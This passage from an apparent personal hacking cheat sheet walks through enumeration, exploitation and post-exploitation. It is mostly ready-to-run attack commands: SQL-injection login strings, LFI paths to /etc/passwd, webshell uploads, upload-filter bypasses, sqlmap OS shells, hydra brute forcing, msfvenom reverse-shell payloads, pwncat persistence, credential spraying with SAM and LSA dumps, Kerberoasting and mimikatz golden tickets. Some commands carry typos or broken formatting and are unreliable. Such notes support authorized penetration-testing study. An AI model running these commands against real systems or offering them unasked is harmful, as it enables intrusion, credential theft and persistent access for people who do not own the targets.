~/tools/legion/legion.py 208 | options 209 | set host 10.0.0.210 210 | run 211 | ``` 212 | 213 | # Enumeration Open Ports 214 | 215 | [Pentesting Network](https://book.hacktricks.xyz/pentesting/pentesting-network) 216 | 217 | ## FTP Enumeration (21) 218 | 219 | ```bash 220 | nmap –script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.0.0.1 221 | FTP anonymous sign in 222 | mget * #download everything 223 | 224 | #can we upload file as anonymous? 225 | #if so we can try upload a cmd webshell and execute commands 226 | locate cmd.aspx #if iis 227 | put cmd.aspx 228 | #browse to the file: 229 | http://IP/cmd.aspx 230 | 231 | #we can also try to create a shell payload with msfvenum and upload it 232 | ``` 233 | 234 | ## **SSH (22):** 235 | 236 | ```bash 237 | ssh INSERTIPADDRESS 22 238 | 239 | nc IP 22 240 | 241 | nmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst --script-args ssh-brute.timeout=4s 242 | 243 | #downloading 244 | scp username@hostname:/path/to/remote/file /path/to/local/file 245 | ``` 246 | 247 | If NMAP show "SSH Filtered" it means that [port knocking](https://blog.rapid7.com/2017/10/04/how-to-secure-ssh-server-using-port-knocking-on-ubuntu-linux/) is enable 248 | 249 | ```bash 250 | #we need to find the /etc/knockd.conf (thorough LFI or FTP or something else) 251 | #inside there is a sequence 252 | knock IP SEQUENCE1 SEQUENCE2 SEQUENCE3 253 | #check nmap again 254 | ``` 255 | 256 | ## **SMTP Enumeration (25):** 257 | 258 | ```bash 259 | nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1 260 | ``` 261 | 262 | ```bash 263 | nc -nvv INSERTIPADDRESS 25 264 | ``` 265 | 266 | ```bash 267 | telnet INSERTIPADDRESS 25 268 | ``` 269 | 270 | ```jsx 271 | use auxiliary/scanner/smtp/smtp_enum 272 | msf auxiliary(smtp_enum) > set rhosts 192.168.1.107 273 | msf auxiliary(smtp_enum) > set rport 25 
274 | msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt 275 | msf auxiliary(smtp_enum) > exploitw 276 | ``` 277 | 278 | ## DNS (53) 279 | 280 | ```bash 281 | #DNS zone transfer 282 | sudo nano /etc/hosts 283 | 10.10.10.123 friendzone.red 284 | host -l friendzone.red 10.10.10.123 285 | ``` 286 | 287 | ## **Finger Enumeration (79):** 288 | 289 | Download script and run it with a wordlist: [http://pentestmonkey.net/tools/user-enumeration/finger-user-enum](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) 290 | 291 | ```bash 292 | finger-user-enum.pl [options] (-u username|-U users.txt) (-t host|-T ips.txt)( 293 | ``` 294 | 295 | ## **Web Enumeration (80/443):** 296 | 297 | [extra enumeration from hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web) 298 | 299 | if we get default apache page, try entering IP to HOSTS 300 | 301 | Before dirbusting, try going to index.php or index.html to know which extention to look for 302 | 303 | ```bash 304 | dirbuster (GUI) 305 | #1st try without "be recursive" 306 | ``` 307 | 308 | ```powershell 309 | cd ~/tools 310 | ./feroxbuster -u URL -w WORDLIST -x EXT -C 403 -t 100 311 | ``` 312 | 313 | ```bash 314 | Web Extensions 315 | 316 | sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar 317 | ``` 318 | 319 | ```bash 320 | dirb http://target.com /path/to/wordlist 321 | dirb http://target.com /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.old 322 | ``` 323 | 324 | ```bash 325 | gobuster dir -u https://target.com -b 403 ms-w /usr/share/wordlists/dirb/big.txt -x .txt,.php 326 | use -r (recursive) or try found folders 327 | ``` 328 | 329 | ```bash 330 | nikto –h 10.0.0.1 #web vulnerability scanner 331 | ``` 332 | 333 | ```jsx 334 | owasp zap 335 | ``` 336 | 337 | ```bash 338 | Look for Default Credentials 339 | ``` 340 | 341 | ```bash 342 | sql 343 | ``` 344 | 345 | - View Page Source 346 | 347 | ```bash 348 | Hidden Values 349 | Developer 
Remarks 350 | Extraneous Code 351 | Passwords! 352 | ``` 353 | 354 | - burpsuite 355 | 356 | ```bash 357 | compare “host:” 358 | crsf token = no bruteforce 359 | add php code if url has anything.php 360 | <L> 361 | anything being executed? 362 | try directory traversal 363 | ../../../home 364 | ``` 365 | 366 | - sign in page 367 | 368 | ```bash 369 | SQL Injection 370 | 371 | ‘or 1=1– – 372 | ‘ or ‘1’=1 373 | ‘ or ‘1’=1 — – 374 | ‘– 375 | Use known Username 376 | tyler’ — – 377 | tyler’) — – 378 | 379 | #bruteforce 380 | hydra -L <username list> -p <password list> <IP Address> <form parameters><failed login message> 381 | ``` 382 | 383 | - file upload 384 | 385 | ```bash 386 | 387 | #if NMAP show something like: Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND 388 | #we want to check if we can upload files 389 | davtest -url http://IP 390 | #if we see succedd we can use curl to upload: 391 | curl -X PUT http://10.10.10.15/df.txt -d @test.txt 392 | #and execute it: 393 | **curl http://10.10.10.15/df.txt** 394 | 395 | Blacklisting bypass 396 | bypassed by uploading an unpopular php extensions. such as: pht, phpt, phtml, php3, php4, php5, php6 397 | Whitelisting bypass 398 | passed by uploading a file with some type of tricks, Like adding a null byte injection like ( shell.php%00.gif ). 
Or by using double extensions for the uploaded file like ( shell.jpg.php) 399 | ``` 400 | 401 | - Wfuzz - Subdomain brute forcer, replaces a part of the url like username with wordlist 402 | 403 | ```bash 404 | wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test 405 | 406 | wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ 407 | 408 | wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ" 409 | 410 | wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ 411 | 412 | wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ 413 | ``` 414 | 415 | - [Knockpy](https://github.com/guelfoweb/knock) - enumerate subdomains on a target domain through a wordlist 416 | 417 | ```bash 418 | knockpy domain.com 419 | ``` 420 | 421 | - wpscan - if wordpress found 422 | 423 | ```bash 424 | wpscan --url [http://:80$target](http://:80$target) --enumerate u,t,p | tee $target-wpscan-enum 425 | #if we can enter wordpres, we can change the 404 page to php reverse shell code and gain access 426 | ``` 427 | 428 | - joomscan - if joomla found 429 | 430 | ```powershell 431 | 432 | cd ~/tools/joomscan 433 | perl joomscan.pl -u http://10.10.10.150/administrator/ 434 | ``` 435 | 436 | ## If A File is found 437 | 438 | - steghide - check pictures for hidden files 439 | 440 | ```bash 441 | apt-get install steghide 442 | 443 | steghide extract -sf picture.jpg 444 | 445 | steghide info picture.jpg 446 | 447 | apt-get install stegosuite 448 | ``` 449 | 450 | - [Stegseek](https://github.com/RickdeJager/stegseek) - lightning fast steghide cracker to extract hidden data from files 451 | 452 | ```bash 453 | stegseek [stegofile.jpg] [wordlist.txt] 454 | ``` 455 | 456 | - binwalk - extract hidden files from files (steganography) 457 | 458 | ```bash 459 | binwalk FILE.JPG 460 | #if something was found 461 | binwalk -e FILE 462 | ``` 463 | 464 | - 
strings - check strings in files 465 | 466 | ```bash 467 | stringe FILE.jpg 468 | ``` 469 | 470 | - [exiftool](https://github.com/exiftool/exiftool) - pictures metadata 471 | - zip2john - prepare an encrpyted zip file for john hacking 472 | 473 | ```bash 474 | zip2john ZIPFILE > zip.hashs 475 | ``` 476 | 477 | - SQLite DB 478 | 479 | ```powershell 480 | #if we found a flat-file db 481 | file EXAMPLE.db 482 | #if sqlite3 483 | sqlite3 <database-name> 484 | .tables 485 | PRAGMA table_info(customers); 486 | SELECT * FROM customers; 487 | ``` 488 | 489 | - sqlmap - check website for sql injection (more info down) 490 | 491 | [Sqlmap trick](https://hackertarget.com/sqlmap-post-request-injection/) - if we have a login page, we can try admin:admin, catch that in burpsuite, save the full request to a file, run: 492 | 493 | ```bash 494 | sqlmap -r FILENAME --level=5 --risk=3 --batch 495 | sqlmap -r FILENAME -dbs --level=5 --risk=3 --batch 496 | 497 | sqlmap -r FILENAME --dbs #enumarate DB's 498 | sqlmap -r FILENAME -D DB_Name --tables #enumarate tables 499 | sqlmap -r FILENAME -D DB_Name -T TABLE_Name --dump #DUMP table 500 | 501 | #Find SQL in webpage url automatically 502 | sqlmap -u https://IP/ –crawl=1 503 | 504 | #with authentication 505 | sqlmap -u “http://target_server” -s-data=param1=value1&param2=value2 -p param1--auth-type=basic --auth-cred=username:password 506 | 507 | #Get A Reverse Shell (MySQL) 508 | sqlmap -r post_request.txt --dbms "mysql" --os-shell 509 | ``` 510 | 511 | - [fimap](https://github.com/kurobeats/fimap) - Check for LFI, find, prepare, audit, exploit and even google automatically for local and remote file inclusion 512 | 513 | ```bash 514 | ~/tools/fimap/src/fimap.py –H –u http://target-site.com/ -w output.txt 515 | ``` 516 | 517 | If we see in burpsuite php$url= we need to test for LFI (try /etc/passwrd) 518 | 519 | ```bash 520 | http://$ip/index.php?page=/etc/passwd 521 | http://$ip/index.php?file=../../../../etc/passwd 522 | ``` 523 | 524 | 
## If a page redirects to another, we can use Burp to stop it
on` #download all the files 608 | mget *` #download all files in this share 609 | 610 | ``` 611 | 612 | ```bash 613 | enum4linux -a 10.0.0.1 #Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing 614 | ``` 615 | 616 | ```bash 617 | nbtscan x.x.x.x #Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain 618 | ``` 619 | 620 | ```bash 621 | ridenum.py 192.168.XXX.XXX 500 50000 dict.txt 622 | ``` 623 | 624 | ```bash 625 | python /home/hasamba/tools/impacket/build/scripts-3.8/samrdump.py 192.168.XXX.XXX 626 | ``` 627 | 628 | ```bash 629 | nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse $IP 630 | ``` 631 | 632 | smb4k on Kali, useful Linux GUI for browsing SMB shares 633 | 634 | ```bash 635 | apt-get install smb4k -y 636 | ``` 637 | 638 | - on Windows: 639 | - Download All Files From A Directory Recursively 640 | 641 | ```bash 642 | smbclient '\\server\share' -N -c 'prompt OFF;recurse ON;cd 'path\to\directory\';lcd '~/path/to/download/to/';mget *' 643 | ``` 644 | 645 | ```bash 646 | net use \\TARGET\IPC$ "" /u:"" #Manual Null session testing 647 | ``` 648 | 649 | ## **SNMP Enumeration (161):** 650 | 651 | - Fix SNMP output values so they are human readable: 652 | 653 | ```bash 654 | apt-get install snmp-mibs-downloader download-mibs 655 | echo "" > /etc/snmp/snmp.conf 656 | ``` 657 | 658 | ```bash 659 | snmpwalk -c public -v1 192.168.1.X 1| 660 | grep hrSWRunName|cut -d* * -f 661 | ``` 662 | 663 | ```bash 664 | snmpcheck -t 
192.168.1.X -c public 665 | ``` 666 | 667 | ```bash 668 | onesixtyone -c names -i hosts 669 | ``` 670 | 671 | ```bash 672 | nmap -sT -p 161 192.168.X.X -oG snmp_results.txt 673 | nmap -n -vv -sV -sU -Pn -p 161,162 --script=snmp-processes,snmp-netstat IP 674 | ``` 675 | 676 | ```bash 677 | snmpenum -t 192.168.1.X 678 | ``` 679 | 680 | ```bash 681 | onesixtyone -c names -i hosts 682 | ``` 683 | 684 | ```bash 685 | #metasploit 686 | auxiliary/scanner/snmp/snmp_enum 687 | auxiliary/scanner/snmp/snmp_enum_hp_laserjet 688 | auxiliary/scanner/snmp/snmp_enumshares 689 | auxiliary/scanner/snmp/snmp_enumusers 690 | auxiliary/scanner/snmp/snmp_login 691 | ``` 692 | 693 | ## **Oracle (1521):** 694 | 695 | ```bash 696 | tnscmd10g version -h INSERTIPADDRESS 697 | ``` 698 | 699 | ```bash 700 | tnscmd10g status -h INSERTIPADDRESS 701 | ``` 702 | 703 | ## LDAP (389) 704 | 705 | [JXplorer - an open source LDAP browser](http://jxplorer.org/) 706 | 707 | ## MSSQL (1433) 708 | 709 | ```bash 710 | nmap -n -v -sV -Pn -p 1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=passwords.txt IP 711 | nmap -n -v -sV -Pn -p 1433 --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password IP 712 | ``` 713 | 714 | [Hunting for MSSQL | Offensive Security](https://www.offensive-security.com/metasploit-unleashed/hunting-mssql/) 715 | 716 | ## **Mysql Enumeration (3306):** 717 | 718 | ```bash 719 | nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 720 | 721 | mysql -h IP -u root -p 722 | show databases; 723 | show tables; 724 | use tablename; 725 | describe table; 726 | select table1, table2 from tablename; 727 | ``` 728 | 729 | ## Active Directory 730 | 731 | ```bash 732 | # current domain info 733 | [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() 734 | 735 | # domain trusts 736 | 
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() 737 | 738 | # current forest info 739 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() 740 | 741 | # get forest trust relationships 742 | ([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships() 743 | 744 | # get DCs of a domain 745 | nltest /dclist:offense.local 746 | net group "domain controllers" /domain 747 | 748 | # get DC for currently authenticated session 749 | nltest /dsgetdc:offense.local 750 | 751 | # get domain trusts from cmd shell 752 | nltest /domain_trusts 753 | 754 | # get user info 755 | nltest /user:"spotless" 756 | 757 | # get DC for currently authenticated session 758 | set l 759 | 760 | # get domain name and DC the user authenticated to 761 | klist 762 | 763 | # get all logon sessions. Includes NTLM authenticated sessions 764 | klist sessions 765 | 766 | # kerberos tickets for the session 767 | klist 768 | 769 | # cached krbtgt 770 | klist tgt 771 | 772 | # whoami on older Windows systems 773 | set u 774 | 775 | # find DFS shares with ADModule 776 | Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=offense,DC=local" | select name 777 | 778 | # find DFS shares with ADSI 779 | $s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,DC=offense,DC=local"; $s.FindAll() | % {$_.properties.name} 780 | 781 | # check if spooler service is running on a host 782 | powershell ls "\\dc01\pipe\spoolss" 783 | ``` 784 | 785 | ## MSSQL 786 | 787 | Try using "Browse for More" via MS SQL Server Management Studio 788 | 789 | Enumeration / Discovery: 790 | 791 | Nmap: 792 | 793 | ```bash 794 | nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156 795 | ``` 796 | 797 | Metasploit: 798 | 799 | ```bash 800 | msf > use 
auxiliary/scanner/mssql/mssql_ping 801 | ``` 802 | 803 | ### Bruteforce MSSQL Login 804 | 805 | ```bash 806 | msf > use auxiliary/admin/mssql/mssql_enum 807 | ``` 808 | 809 | ### Metasploit MSSQL Shell 810 | 811 | ```bash 812 | msf > use exploit/windows/mssql/mssql_payload 813 | msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp 814 | ``` 815 | 816 | # Gaining Access 817 | 818 | - hydra: bruteforce tool 819 | 820 | ```bash 821 | hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.0.0.101 -t 4 -v -f 822 | #-l is the user we want to attack, -P password file list, -t threads, -v verbose 823 | #it's better to intercept the login page with burp, check to see the correct username&password syntax and copy the exact failed message 824 | #-f exit when a login/pass pair is found 825 | hydra -l hasamba -P ~/Desktop/test_passwords.txt 10.0.0.210 -s 8085 http-post-form "/login/:username=^USER^&password=^PASS^:F=Authentication failed" -VVV -t 6 - 826 | hydra OPT #will show us optional modules for http and such 827 | hydra -U MODULE_NAME #will show module examples 828 | 829 | hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V #Hydra FTP brute force 830 | hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V #Hydra POP3 brute force 831 | hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V #Hydra SMTP brute force 832 | 833 | hydra -l username -P password-list <URL_TO_SERVER> http-post-form "<PATH-TO_LOGIN>:POST_REQUEST_FOR_LOGIN:FAILED_RESPONSE_IDENTIFIER" 834 | ``` 835 | 836 | - metasploit - can also bruteforce 837 | 838 | ```bash 839 | use auxiliary/scanner/ssh/ssh_login 840 | options 841 | set username root 842 | set pass_file /usr/share... 843 | set rhosts 844 | set threads 10 845 | set verbose true 846 | run 847 | ``` 848 | 849 | - unshadow (kali) - combines both files and inserts the hashed passwords into the passwd file, so we can use this file with hashcat to try to crack the password. 
850 | 851 | ```bash 852 | unshadow PASSSWD_FILE SHADOW_FILE 853 | ``` 854 | 855 | - [hashcat](https://www.notion.so/Hashcat-b885f8ac8c0f450986d62c0d29f44cb9) - crack passwords hashes ([Cheat Sheet](https://s3.us-west-2.amazonaws.com/secure.notion-static.com/a44ab748-a9a9-437e-a4a1-2fa1cc6c03a8/HashcatCheatSheet.v2018.1b.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAT73L2G45O3KS52Y5%2F20201122%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20201122T190235Z&X-Amz-Expires=86400&X-Amz-Signature=03753b73d70b97901e6a764011ae5ffdbffc2d9dcbd00673f79b64097b1299d9&X-Amz-SignedHeaders=host&response-content-disposition=filename%20%3D%22HashcatCheatSheet.v2018.1b.pdf%22)) 856 | 857 | ```bash 858 | hashcat -m "OSCODE" unshadow.txt passwordFile.txt 859 | #from here: https://github.com/frizb/Hashcat-Cheatsheet 860 | hashcat --force -m300 --status -w3 -o found.txt --remove --potfile-disable -r rules\OneRuleToRuleThemAll.rule hash.txt rockyou.txt 861 | ``` 862 | 863 | - hash-identifier 864 | 865 | ```bash 866 | hash-identifier [hash] 867 | ``` 868 | 869 | - [name-that-hash](https://github.com/HashPals/Name-That-Hash) - better hash analyzer 870 | 871 | ```jsx 872 | 873 | ``` 874 | 875 | - cewl - create wordlist from a website 876 | 877 | ```bash 878 | cewl -v --with-numbers -e --email_file cewl_email.wordlist -w cewl.wordlist http://sneakycorp.htbme 879 | 880 | #my favorite rule to add: 881 | john --wordlist=wordlist.txt --rules=jumbo --stdout > wordlist-modified.txt 882 | 883 | hashcat --force cewl.wordlist -r /usr/share/hashcat/rules/best64.rule --stdout > hashcat_words 884 | 885 | https://github.com/praetorian-inc/Hob0Rules 886 | ###hob064 This ruleset contains 64 of the most frequent password patterns 887 | hashcat -a 0 -m 1000 <NTLMHASHES> wordlists/rockyou.txt -r hob064.rule -o cracked.txt 888 | 889 | ###d3adhob0 This ruleset is much more extensive and utilizes many common password structure ideas 890 | hashcat -a 0 -m 1000 <NTLMHASHES> wordlists/english.txt -r 
d3adhob0.rule -o cracked.txt 891 | 892 | #adding John rules 893 | john --wordlist=wordlist.txt --rules --stdout > wordlist-modified.txt 894 | john --wordlist=wordlist.txt --rules=best64 --stdout > wordlist-modified.txt 895 | ``` 896 | 897 | - john the ripper - password cracker ([cheat sheet](https://drive.google.com/viewerng/viewer?url=https://countuponsecurity.files.wordpress.com/2016/09/jtr-cheat-sheet.pdf)) ([Jumbo community version](https://github.com/openwall/john)) 898 | 899 | ```bash 900 | john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt 901 | #after john finished, ask him to show 902 | john hashes.txt --show 903 | 904 | john 127.0.0.1.pwdump --wordlist=dictionary.txt --rules=Jumbo #with jumbo rules from https://github.com/openwall/john 905 | ``` 906 | 907 | [CyberChef](https://gchq.github.io/CyberChef/) 908 | 909 | [CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.](https://crackstation.net/) 910 | 911 | [Hash Analyzer](https://www.tunnelsup.com/hash-analyzer/) 912 | 913 | [Cipher Identifier (online tool) | Boxentriq](https://www.boxentriq.com/code-breaking/cipher-identifier) 914 | 915 | - msfvenom(kali) - tool to create malware 916 | 917 | ```bash 918 | msfvenom -p windows/meterpreter/reverse_tcp LHOSTS=10.10.10.14 LPORT=4444 -f aspx > ex.aspx 919 | 920 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war 921 | ``` 922 | 923 | - [responder (imapcket)](https://www.notion.so/responder-imapcket-b7bdbbb91ce74e98834dd88ec1715528) - MITM - listening in the background and wait for a failed dns request 924 | 925 | ```bash 926 | responder -I eth0 -rdwv #Run Responder.py for the length of the engagement while you're working on other attack vectors. 
927 | ``` 928 | 929 | # Post Exploitation 930 | 931 | ## Useful commands running locally on the Linux system To quickly analyze the system and possibly help to escalate privileges 932 | 933 | - whoami - shows the user we logged in with 934 | - history - show last history, it usually can show any password or personal stuff the user execute 935 | - sudo -l - show what programs we can run without sudo, check all process against [GTFOBins](https://gtfobins.github.io/) 936 | - if we get `(ALL, !root) /bin/bash`, we can exploit with [this](https://www.exploit-db.com/exploits/47502) 937 | - uname -a - will show us the linux version so we can search for a script that will escalate privileges 938 | - export - check system variables 939 | - processes 940 | 941 | ```bash 942 | ps -ef 943 | ps auxf 944 | ps auxfww 945 | ``` 946 | 947 | - find in files 948 | 949 | ```bash 950 | find . -name "*.java" -type f -exec fgrep -iHn "textToFind" {} \; 951 | find . -regex ".*\.\(c\|java\)" -type f -exec fgrep -iHn "textToFind" {} \; 952 | find / -maxdepth 4 -name *.conf -type f -exec grep -Hn "textToFind" {} \; 2>/dev/null 953 | # SUID files owned by root 954 | find / -uid 0 -perm -4000 -type f 2>/dev/null 955 | # SUID files owned by root and world readable 956 | find / -uid 0 -perm -u=s,o=r -type f -exec ls -la {} \; 2> /dev/null 957 | # SUID files 958 | find / -perm -4000 -type f 2>/dev/null 959 | # world writable directories 960 | find / -perm -2 -type d 2>/dev/null 961 | 962 | #find passwords in files and ignore errors and filter out the proc and other folders 963 | find . ! -path "*/proc/*" -type f -name "*" -exec fgrep -iHn password {} \; 964 | find . -type f \( -iname \*.conf -o -iname \*.cfg -o -iname \*.xml -o -iname \*.ini -o -iname \*.json -o -iname \*.sh -o -iname \*.pl -o -iname \*.py \) -exec fgrep -iHn password {} \; 2> /dev/null 965 | 966 | # find using several patterns read from file (patterns are delimited by new line) 967 | find . 
-type f -exec grep -iHFf patterns.txt {} \; 968 | 969 | # find password keyword in small files 970 | find . -type f -size -512k -exec fgrep -iHn password {} \; 971 | 972 | # reverse java jar files and find passwords there 973 | find . -name "*.jar" -type f -exec ~/jd-cli/jd-cli -oc -l -n -st {} \; | egrep -i -e "Location:" -e "password" | uniq 974 | ``` 975 | 976 | ```bash 977 | # check open ports and services listening 978 | netstat -anp 979 | 980 | # check defined hosts 981 | cat /etc/hosts 982 | 983 | # check local IP addresses and interfaces 984 | ifconfig -a 985 | 986 | # check route 987 | route -v 988 | 989 | # check filesystem 990 | df 991 | 992 | # check sudo privileges 993 | sudo -l 994 | 995 | # check crontab 996 | crontab -l 997 | 998 | # check inittab 999 | cat /etc/inittab 1000 | 1001 | # try to sniff traffic 1002 | tcpdump 1003 | tcpdump -s0 not port 22 -w trace.pcap 1004 | 1005 | # check known hosts 1006 | cat ~/.ssh/known_hosts 1007 | 1008 | # try access mails 1009 | head /var/mail/root 1010 | 1011 | # list groups, users 1012 | cat /etc/group 1013 | cat /etc/passwd 1014 | # with root privileges 1015 | cat /etc/shadow 1016 | 1017 | # check shared memory 1018 | ipcs -mp 1019 | 1020 | # logout 1021 | logout 1022 | 1023 | # close script session 1024 | Ctrl + D 1025 | ``` 1026 | 1027 | ## Scripts 1028 | 1029 | - [pwncat](https://github.com/calebstewart/pwncat) - pwncat is a post-exploitation platform for Linux targets 1030 | 1031 | ```bash 1032 | cd ~/tools 1033 | source pwncat-env/bin/activate 1034 | 1035 | # Connect to a bind sheql 1036 | pwncat connect://10.10.10.10:4444 1037 | pwncat 10.10.10.10:4444 1038 | pwncat 10.10.10.10 4444 1039 | # Listen for reverse shell 1040 | pwncat bind://0.0.0.0:4444 1041 | pwncat 0.0.0.0:4444 1042 | pwncat :4444 1043 | pwncat -lp 4444 1044 | # Connect via ssh 1045 | pwncat ssh://user:password@10.10.10.10 1046 | pwncat user@10.10.10.10 1047 | pwncat user:password@10.10.10.10 1048 | pwncat -i id_rsa user@10.10.10.10 1049 
| # SSH w/ non-standard port 1050 | pwncat -p 2222 user@10.10.10.10 1051 | pwncat user@10.10.10.10:2222 1052 | # Reconnect utilizing installed persistence 1053 | # If reconnection fails and no protocol is specified, 1054 | # SSH is used as a fallback. 1055 | pwncat reconnect://user@10.10.10.10 1056 | pwncat reconnect://user@c228fc49e515628a0c13bdc4759a12bf 1057 | pwncat user@10.10.10.10 1058 | pwncat c228fc49e515628a0c13bdc4759a12bf 1059 | pwncat 10.10.10.10 1060 | 1061 | ^D 1062 | run enumerate.gather 1063 | 1064 | run escalate.auto exec 1065 | 1066 | ---OLD--- 1067 | 1068 | upload/download --help 1069 | 1070 | persist --help 1071 | persist --install 1072 | persist --status 1073 | persist --clean 1074 | 1075 | tamper --help 1076 | 1077 | busybox --install 1078 | 1079 | enum --help 1080 | enum --show --type sudo 1081 | enum --report enumaration.md 1082 | 1083 | privsec --help 1084 | privsec -l 1085 | privsec --escalate 1086 | privsec -e -u sysadmin 1087 | ``` 1088 | 1089 | - [sherlock](https://github.com/rasta-mouse/Sherlock) - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. 1090 | - [windows exploit suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) - This tool compares a target's patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins. 
1091 | - metasploit migrate process and search suggester 1092 | 1093 | ```bash 1094 | ps 1095 | migrate 1788 1096 | search suggester 1097 | ``` 1098 | 1099 | - [psexec](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/psexec%20d818d32588314cb68f8ca3db57a6e1ef.md), wmiexec.py or [smbexec.py](http://smbexec.py) - privilege escalation for windows 1100 | - [powershellempire](https://github.com/PowerShellEmpire/PowerTools) - windows privilege escalation 1101 | 1102 | ```bash 1103 | powershell -ep (ExecutionPolicy) bypass 1104 | . .\PowerView.ps1 1105 | Get-NetDomain 1106 | Get-NetDomainController 1107 | Get-DomainPolicy 1108 | (Get-DomainPolicy)."system access" 1109 | Get-NetUser 1110 | Get-NetUser | select cn /samaccountname/description 1111 | Get-UserProperty -Properties pwdlastset/logoncount/badpwdcount 1112 | Get-NetComputer -FullData(extra data) | select(like grep) OperatingSystem 1113 | Get-NetGroupMember -GroupName "Domain Admins" 1114 | Invoke-ShareFinder 1115 | Get-NetGPO | select displayname, whenchanged 1116 | 1117 | ``` 1118 | 1119 | - [bloodhound](https://github.com/BloodHoundAD/BloodHound) - easily identify highly complex attack paths 1120 | - crackmapexec - can take passwords or hashes that we found and check them against all computers on a network 1121 | 1122 | ```powershell 1123 | crackmapexec 192.168.57.0/24 -u fcastle -d MARVEL.local -p Password1 1124 | #Spray the network with local login credentials then dump SAM contents 1125 | crackmapexec smb 10.0.0.1/24 -u administrator -p 'password' --local-auth --sam 1126 | #Pass the hash network-wide, local login, dump LSA contents 1127 | crackmapexec smb 10.0.0.1/24 -u administrator -H <hash> --local-auth --lsa 1128 | 1129 | ``` 1130 | 1131 | - [secretsdump.py](http://secretsdump.py) (impacket) - dumps hashes for known user/password 1132 | 1133 | ```powershell 1134 | secretsdump.py marvel/fcastle:Pssword1@192.168.4.4 1135 | ``` 1136 | 1137 | - [incognito 
(meterpeter)](https://www.notion.so/incognito-meterpeter-881379ef297d4b3f8b50745428e1e8ed) - can impersonate a user 1138 | - [GetUserSPNs.py](http://getuserspns.py) (impacket) 1139 | 1140 | ```bash 1141 | GetUserSpns.py marvel.local/fcastle:Password1 -dc-ip 192.168.57.140 -request 1142 | ``` 1143 | 1144 | - [mimikatz](https://github.com/gentilkiwi/mimikatz) - can extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets 1145 | 1146 | ```bash 1147 | mimikatz 1148 | privilege::debug` (allow us to bypass several protections) 1149 | sekurlsa::logonpasswords` show us all users login from reboot, we can pass the hash or crack them, we can search for `wdigest` until windows8 including windows7 the passoword stored in plain text, from windows8 microsoft turned it off, we can turn it on from mimikatz and wait for a user to login 1150 | lsadump::sam` dumps the SAM 1151 | lsadump::lsa /patch` dumps Local Security Authority 1152 | lsadump::lsa /inject /name:krbtgt` 1153 | kerberos::golden /User:Administrator(doesnt matter, can be fake) /domain:marvel.local /sid:SID /krbtgt:NTLM /id:500(your RID) /ptt(pass the ticket to our next session)` 1154 | misc::command` (gives us command prompt with full privilege) 1155 | 